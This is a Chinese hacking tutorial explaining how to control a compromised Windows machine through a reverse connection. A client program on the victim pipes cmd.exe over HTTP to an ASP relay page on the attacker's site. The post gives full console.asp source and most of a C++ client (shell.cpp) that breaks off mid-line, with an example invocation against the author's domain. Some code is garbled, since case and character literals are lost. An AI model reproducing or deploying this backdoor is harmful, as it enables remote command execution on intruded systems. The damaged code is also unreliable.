用ASP实现反向连接控制
原理:用asp实现反向连接,客户端shell.exe大小6k,控制端console.大小1.75k
详解:
灵感来自在入侵渗透内网时需反向连接但没有公网ip的时候,想到asp的application对象功能之强大,所以产生以下想法.
肉机执行程序shell.exe让cmd.exe与偶网站一asp程序进行交互,实现控制
application("output")为输出流,保存程序执行结果
application("input")为输入流,保存要执行的命令
思路:
[client] <-----> [control] <-----> [attacker]
client上运行shell.exe,control运行console.asp,attacker通过访问console.asp控制client
实例:
肉机a,运行"shell.exe cooldiyer.uni.cc /cmd.asp"
偶网站放上cmd.asp,url路径为
这时我访问 (参数一定要加上,标明身份)
就可以进行控制了,refresh刷新可以看到已经有结果了,输入命令,点execute执行,过几秒钟后,
点击refresh按钮可以看到执行结果,点击clear清空输入输出流,执行"exit"程序退出
声明:
只做技术交流,程序只做演示使用,只实现与cmd.exe交互的功能,转载或修改需保留版权
代码:
console.asp
____________________________________________________________________________
<%
功能介绍:
用asp实现反向shell连接,与cmd.exe交互,执行命令后点refresh后就可以看到回显
公用变量 application("input")、application("output")为全局输入输出流
如果请求登录
if request("act") = "login" then
application("login") = "yes"
response.end
end if
如果请求退出
if request("act") = "exit" then
application("login") = "no"
application("input") = ""
application("outout") = ""
response.end
end if
验证是否已经登录
if application("login") <> "yes" and request("who") = "master" then
response.write "client not connect.."
response.end
end if
如果请求执行命令,放到input流里
if request("cmd") <> "" then
application("input") = request("cmd")
end if
如果命令执行完毕,结果放到output流,input流置空
if request("result")<>"" then
application("output") = application("output") + request("result")
application("input") = ""
end if
%>
<% if request("frame")="1" then %>
<%
如果请求清空输入输出流
if request("act") = "clear" then
application("input") = ""
application("output") = ""
response.redirect request.servervariables("script_name")&"?frame=1"
end if
%>
<textarea cols=120 rows=30>
<%=application("output")%>
</textarea>
<a href=# onclick="location.replace(location.href);">refresh</a>
<a href=?frame=1&act=clear>clear</a>
<% elseif request("who") = "master" then %>
<html>
<head><title>asp console manager by cooldiyer</title></head>
<body>
<iframe src=<%=request.servervariables("script_name")%>?frame=1 width=900 height=500 frameborder=0></iframe><br>
<form method=post name=frm>
<input type=text size=50 name="cmd">
<input type=hidden name="who" value="master">
<input type=submit value="execute">
</form>
<script>frm.cmd.focus();</script>
<%
else
response.write application("input")
end if
%>
____________________________________________________________________________
// shell.cpp : defines the entry point for the console application.
//
// 实现功能: 与asp控制端实现交互,实现反向连接
//
#include "stdafx.h"
#include "shell.h"
#include "afxinet.h"
#ifdef _debug
#define new debug_new
#undef this_file
static char this_file[] = __file__;
#endif
#define buffer_size 1024 // 读缓冲区大小
/////////////////////////////////////////////////////////////////////////////
// the one and only application object
cwinapp theapp;
using namespace std;
cstring urlencode(const char* s); // url 编码函数
bool postrequest(const char *szformdata, char *szresult); // 向控制端发送请求函数
void doshell(); // 与cmd.exe进行交互函数
char szserver[50], szpath[50]; // 公用变量
int _tmain(int argc, tchar* argv[], tchar* envp[])
{
int nretcode = 0;
// initialize mfc and print and error on failure
if (!afxwininit(::getmodulehandle(null), null, ::getcommandline(), 0))
{
// tod change error code to suit your needs
cerr << _t("fatal error: mfc initialization failed") << endl;
nretcode = 1;
}
printf("asp console client by cooldiyer
");
if (argc == 3)
{
memset(szserver, 0, sizeof(szserver));
memset(szpath, 0, sizeof(szpath));
strcpy(szserver, argv[1]);
strcpy(szpath, argv[2]);
}
else
{
printf("usage:
rshell <server> <path>
exp.
rshell /x.asp
");
return -1;
}
char szresult[1024];
postrequest("act=login", szresult); //登录
doshell(); // 执行与cmd.exe的交互
postrequest("act=exit", szresult); //退出
return nretcode;
}
//
// url编码函数,返回一个cstring变量
//
cstring urlencode(const char* s)
{
cstring encoded = "";
int len = strlen(s);
char* buf = new char[16]; // way longer than needed
unsigned char c;
for(int i=0; i < len; i++)
{
c = s[i];
if ((c >= a && c <= z) || (c >= a && c <= z) ||
(c >= 0 && c <= 9) || c == . || c == - || c == _)
{
sprintf(buf, "%c", c);
encoded += buf;
continue;
}
if(c == )
{
sprintf(buf, "%c", +);
encoded += buf;
continue;
}
sprintf(buf, "%.2x", c);
encoded += "%";
encoded += buf;
}
delete[] buf;
return encoded;
}
//
// 表单发送函数,核心例程,返回接收到的内容,也就是要执行的命令
//
bool postrequest(const char *szformdata, char *szresult)
{
unsigned int uretry = 3; //重试三次
try{
loop:
cinternetsession session;
chttpconnection *pconnection = session.gethttpconnection(szserver);
chttpfile *pfile = pconnection->openrequest(chttpconnection::http_verb_post, szpath);
// addrequestheaders是必要的
pfile->addrequestheaders("content-type: application/x-www-form-urlencoded");
cstring szdata;
if (pfile -> sendrequest(null,0,(lpvoid) szformdata, strlen(szformdata)+1))
{
while(pfile->readstring(szdata))
{
if (szresult != null)
strcpy(szresult, szdata.getbuffer(0));
}
pfile->close();
}
session.close();
}
catch(...){
if (uretry --)
goto loop;
}
return true;
}
//
// 让cmd.exe与asp控制端进行交互的核心例程
//
void doshell()
{
int ret;
security_attributes sa;
sa.nlength = sizeof( sa );
sa.lpsecuritydescriptor = 0;
sa.binherithandle = true;
handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
ret=createpipe(&hreadpipe1, &hwritepipe1, &sa, 0);
ret=createpipe(&hreadpipe2, &hwritepipe2, &sa, 0);
startupinfo si;
zeromemory(&si, sizeof(si));
getstartupinfo(&si);
si.cb = sizeof(si);
si.dwflags = startf_useshowwindow | startf_usestdhan